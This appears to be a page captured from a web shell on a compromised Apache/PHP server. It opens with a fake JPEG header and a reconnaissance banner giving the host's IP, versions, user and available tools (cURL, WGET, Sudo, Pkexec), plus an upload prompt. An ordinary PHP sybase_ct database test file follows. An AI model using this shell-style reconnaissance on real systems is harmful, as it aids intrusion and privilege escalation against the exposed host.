????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.224.33.135 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/sybase_ct/tests/ |
Upload File : |
--TEST-- Sybase-CT query without storing --SKIPIF-- <?php require('skipif.inc'); ?> --FILE-- <?php /* This file is part of PHP test framework for ext/sybase_ct * * $Id$ */ require('test.inc'); $db= sybase_connect_ex(); // Create test table and insert some data var_dump(sybase_query(' create table #test ( id numeric(10, 0) primary key not null, caption varchar(255) not null, author varchar(50) not null, link varchar(255) null, lastchange datetime default getdate() null ) ', $db)); var_dump(sybase_query('insert into #test ( id, caption, author ) values ( 1, "Hello", "timm" ) ', $db)); var_dump(sybase_query('insert into #test ( id, caption, author, link ) values ( 2, "World", "thekid", "http://thekid.de/" ) ', $db)); var_dump(sybase_query('insert into #test ( id, caption, author ) values ( 3, "PHP", "friebe" ) ', $db)); // Fetch data $q= sybase_unbuffered_query('select * from #test order by id', $db, FALSE); var_dump($q); while ($row= sybase_fetch_assoc($q)) { var_dump($row); } // Clean up and close connection var_dump(sybase_query('drop table #test')); sybase_close($db); ?> --EXPECTF-- bool(true) bool(true) bool(true) bool(true) resource(%d) of type (sybase-ct result) array(5) { ["id"]=> int(1) ["caption"]=> string(5) "Hello" ["author"]=> string(4) "timm" ["link"]=> NULL ["lastchange"]=> string(%d) "%s" } array(5) { ["id"]=> int(2) ["caption"]=> string(5) "World" ["author"]=> string(6) "thekid" ["link"]=> string(17) "http://thekid.de/" ["lastchange"]=> string(%d) "%s" } array(5) { ["id"]=> int(3) ["caption"]=> string(3) "PHP" ["author"]=> string(6) "friebe" ["link"]=> NULL ["lastchange"]=> string(%d) "%s" } bool(true)